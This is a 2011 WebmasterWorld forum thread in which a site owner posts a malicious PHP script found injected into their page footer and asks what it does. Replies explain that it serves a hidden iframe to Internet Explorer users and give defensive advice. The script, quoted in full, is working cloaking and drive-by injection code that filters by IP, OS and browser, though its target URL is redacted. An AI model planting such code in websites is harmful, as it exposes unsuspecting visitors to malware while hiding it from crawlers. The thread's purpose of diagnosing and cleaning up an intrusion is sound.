homepage Welcome to WebmasterWorld Guest from 54.211.219.178
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library, Charter, Moderators: coopster & jatar k

PHP Server Side Scripting Forum

    
Site Compromised. Need Help Understanding This Script
Dead_Elvis




msg:4280295
 5:24 pm on Mar 11, 2011 (gmt 0)

Hi,

I don't know if this is the correct forum for this or not, so please excuse me if I'm not in the correct place.

This morning I kind of accidentally discovered that my site had been compromised. What I found was this script being loaded in the footer of my pages.

I don't know enough about the code used to understand what it does... would anyone like to help me figure it out?

Thanks in advance!

<?
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}

function net()
{
$ip=$_SERVER['REMOTE_ADDR'];

if(
net_match('64.***.160.0/19',$ip)==0 &&
net_match('66.***.0.0/20',$ip)==0 &&
net_match('66.***.64.0/19',$ip)==0 &&
net_match('72.***.192.0/18',$ip)==0 &&
net_match('74.***.0.0/16',$ip)==0 &&
net_match('89.***.224.0/24',$ip)==0 &&
net_match('193.***.125.0/24',$ip)==0 &&
net_match('194.***.194.0/24',$ip)==0 &&
net_match('209.***.128.0/17',$ip)==0 &&
net_match('216.***.32.0/19',$ip)==0 &&
net_match('128.***.0.0/16',$ip)==0 &&
net_match('67.***.0.0/16',$ip)==0 &&
net_match('188.***.0.0/16',$ip)==0
)
return true;
}

function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}detect_os();


function detect_brows() {
global $OOOOO0000, $OOOOOO000;
$user_agent = $_SERVER["HTTP_USER_AGENT"];
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
) $OOOOOO000 = "MSIE";
}detect_brows();

$IP = "{$_SERVER[REMOTE_ADDR]}.log";

function _log()
{ global $IP;
touch ("/tmp/freshnews/{$IP}");
}

function _check()
{
global $IP;
if(!file_exists("/tmp/freshnews/{$IP}")) return true;
}
$sfkg=base64_decode('[alphanumeric string]');
if(_check())
{
if(net())
{
if($os)
{
if($OOOOOO000 == "MSIE")
{
echo 'document.write(\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\');';

_log();

}}}}

[edited by: tedster at 7:33 pm (utc) on Mar 12, 2011]
[edit reason] obscure specifics [/edit]

 

topr8




msg:4280305
 5:47 pm on Mar 11, 2011 (gmt 0)

it doesn't matter what it does, you've got to patch the hole in your security.

... at a glance it serves an iframe, doubtless with a dubious source to internet explorer users who are not from the ip ranges shown

Dead_Elvis




msg:4280308
 5:52 pm on Mar 11, 2011 (gmt 0)

Thanks topr8,

Yes, I am in the process of finding and patching the hole. They seem to have accessed the site via FTP.

It seemed like knowing what the script does would help me find any other compromised files, directories, etc.

Thanks again.

jimbeetle




msg:4280316
 6:06 pm on Mar 11, 2011 (gmt 0)

They seem to have accessed the site via FTP

Then be sure to check your local machine for a keylogger, scrub it good if one is found, then change all your passwords.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved